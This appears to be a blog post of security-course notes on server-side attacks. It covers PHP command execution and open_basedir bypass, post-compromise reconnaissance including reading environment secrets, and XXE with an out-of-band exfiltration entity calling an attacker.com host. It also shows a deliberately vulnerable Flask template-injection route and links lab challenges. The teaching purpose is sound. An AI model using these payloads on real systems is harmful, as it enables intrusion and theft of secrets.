Server Side Attacks

sean

PHP

#PHP is a great language

Interactive shell

php > $a = "phpinfo";
php > $a();
phpinfo()
PHP Version => 7.1.16

System => Darwin devoops.local 17.4.0 Darwin Kernel Version 17.4.0: Sun Dec 17 09:19:54 PST 2017; root:xnu-4570.41.2~1/RELEASE_X86_64 x86_64

Direct execution

People love using exec to be lazy. Common things to look for:

  • Directory listings
  • Network utilities
    • Ping -> ping $ip
    • Traceroute -> traceroute $ip
    • Whois -> whois $domain

Execute commands through exec/system

> php -a
Interactive shell

php > echo exec('ls');
z.sh

Exec only returns the last line of output in the return value:

string exec ( string $command [, array &$output [, int &$return_var ]] )

Alternative to exec is system:

> php -a
Interactive shell

php > echo system('ls');
Applications
Desktop
Documents
Downloads
IMG_1508.jpg
IdeaProjects
Latest_Tunnelblick_Stable.dmg
Library
Movies

Exec disabled? Don't worry PHP has you covered!

> php -a
Interactive shell

php > echo passthru('ls -la');
total 41368
drwxr-xr-x+ 107 carey  staff      3424  2 May 10:45 .
drwxr-xr-x    6 root   admin       192 13 Mar 02:10 ..
drwx------    3 carey  staff        96  7 Mar 12:24 .BurpSuite
-r--------    1 carey  staff         7  7 Mar 01:03 .CFUserTextEncoding
-rw-r--r--@   1 carey  staff     18436  2 May 12:37 .DS_Store
drwx------   30 carey  staff       960 27 Apr 15:14 .Trash
drwxr-xr-x    2 carey  staff        64 21 Mar 09:58 .android

Also: backticks execute code

> php -a
Interactive shell

php > echo `ls -la`;
total 41368
drwxr-xr-x+ 107 carey  staff      3424  2 May 10:45 .
drwxr-xr-x    6 root   admin       192 13 Mar 02:10 ..
drwx------    3 carey  staff        96  7 Mar 12:24 .BurpSuite
-r--------    1 carey  staff         7  7 Mar 01:03 .CFUserTextEncoding
-rw-r--r--@   1 carey  staff     18436  2 May 12:28 .DS_Store
drwx------   30 carey  staff       960 27 Apr 15:14 .Trash
drwxr-xr-x    2 carey  staff        64 21 Mar 09:58 .android
-rw-------    1 carey  staff      8783 29 Apr 13:27 .bash_history
-rw-r--r--    1 carey  staff      2756 27 Apr 14:06 .bash_profile

Why is this useful? You now have arbitrary good non-php code execution.

Exhibit 1: Bypassing open_basedir

open_basedir basically restricts your php to executing to a certain directory. File functions will fail when accessing directories outside of the open_basedir directory. However, open_basedir restrictions aren't applied to exec'd code.

> php -a
Interactive shell

php > ini_set('open_basedir', '/tmp');
php > echo file_get_contents('/etc/hosts');
PHP Warning:  file_get_contents(): open_basedir restriction in effect. File(/etc/hosts) is not within the allowed path(s): (/tmp) in php shell code on line 1

Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/hosts) is not within the allowed path(s): (/tmp) in php shell code on line 1
PHP Warning:  file_get_contents(/etc/hosts): failed to open stream: Operation not permitted in php shell code on line 1

Warning: file_get_contents(/etc/hosts): failed to open stream: Operation not permitted in php shell code on line 1
php > echo `cat /etc/hosts`;
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1	localhost
255.255.255.255	broadcasthost
::1             localhost

# CS6443
172.16.96.128	yipple.ns.agency.dev
172.16.96.128   uvm.local

127.0.0.1 cspdomain2
127.0.0.1 lol

Exhibit 2: What's listening on this host?

Knowing your way around standard linux utils is another important thing.

>>> php -a
Interactive mode enabled

php > echo `netstat -tulpn`;
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:36205           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:52205           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:59565           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -

Exhibit 2.5: Dump the contents of your ARP cache

Useful for discovering what hosts your compromised box knows.

php > echo `arp -n`;
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.96.1              ether   00:50:56:c0:00:08   C                     ens33
172.16.96.2              ether   00:50:56:fd:f0:2d   C                     ens33
172.16.96.254            ether   00:50:56:ed:67:6c   C                     ens33

Exhibit 2.75: Get environment variables

Useful for stealing deployment secrets (flask secrets, etc).

php > echo `cat /proc/self/environ`;
MAIL=/var/mail/carey
SSH_CLIENT=172.16.96.1 49803 22
USER=carey
SHLVL=1
HOME=/home/carey
SSH_TTY=/dev/pts/8
PS1=\[\]\u@\[\]\[\]\h \[\]in \[\]\w\[\]$([[ -n $(git branch 2> /dev/null) ]] && echo " on ")\[\]$(parse_git_branch)\[\]\n>>> \[\]PS2=\[\]→ \[\]
QT_QPA_PLATFORMTHEME=appmenu-qt5
LOGNAME=carey
_=/usr/bin/php
XDG_SESSION_ID=295
TERM=xterm-256color
BOLD=
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
RESET=XDG_RUNTIME_DIR=/run/user/1000GREEN=LANG=en_US.UTF-8
MAGENTA=SSH_AUTH_SOCK=/tmp/ssh-EhuI5t5bRB/agent.89949SHELL=/bin/bash
PROMPT_COMMAND=echo -ne "\033]0;${PWD##*/}\007"
_z --add "$(command pwd -P 2>/dev/null)" 2>/dev/null;
ORANGE=
PWD=/home/carey
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=172.16.96.1 49803 172.16.96.128 22
PURPLE=

XML XXE

What you covered in your lecture basically, except now with more XML.

Disclaimer: These images are stolen from 6843 lecture slides

Exhibit 3: Including files from XXE

You can apply the attacks above of stealing environment variables, arbitrary files, etc.

sample_xxe

Exhibit 4: When you can't include payloads directly, why not include remotely?

remote_xxe_1

Meanwhile at http://sean.local:8000/

remote_xxe_2

Exhibit 5: When you can't get output from your XXE directly

oob_xxe

Fun tricks for OOB XXE

If a local firewall is blocking port 80 or 443 from the internal network, you can exfiltrate through DNS. You'll probably need a way to split this up & base64 encode so the domain isn't overly long, and doesn't break the URL (https://tools.ietf.org/html/rfc3986 for syntax).

<!ENTITY % all "<!ENTITY send SYSTEM 'http://%file.attacker.com'>">
%all;

Extended break challenges for XXE

https://7xxxxxxxml.redline.eu.ns.agency/
https://8xxxxxxxxml.redline.jp.ns.agency/

Python

I'm running out of time writing this so I'll be brief lol.

Python is a relatively sane language (and isn't primarily a web language so this is slighty too general) so this section will be blank.

Flask (Jinja)

Jinja is relatively safe, until people do dumb things like render strings as {{ var | safe }}, which leads to xss. However, another bad thing we can do is render strings as templates:

#!/usr/bin/env python
from flask import render_template_string, request, render_template
import re
from . import app

@app.route('/test')
def test():
    if re.match(r'[Cc]url.*',request.headers.get('User-Agent')):
        return render_template_string("you are curl")

    # Blindly bad example of how to do ssti
    return render_template_string(request.form['input'])

Now that user controlled input is being passed as a template, we can do fun things:

Screen-Shot-2018-05-02-at-2.53.15-pm

Once you can get to a reference to an Object, you can do whatever you want (mostly).

Screen-Shot-2018-05-02-at-2.59.26-pm

Good read: https://0day.work/jinja2-template-injection-filter-bypasses/

Things to try

http://websec.fr/level05/index.php - PHP code injection for maximum lol

Sy extra special trolling

http://ssti.lecture.ns.agency/

  • Shell exec. Flag at /

http://xml.lecture.ns.agency/

  • SSRF. Flag on internal host pivot

http://logfile.lecture.ns.agency/

  • Shell exec. Flag at /
Show Comments

Get the latest posts delivered right to your inbox.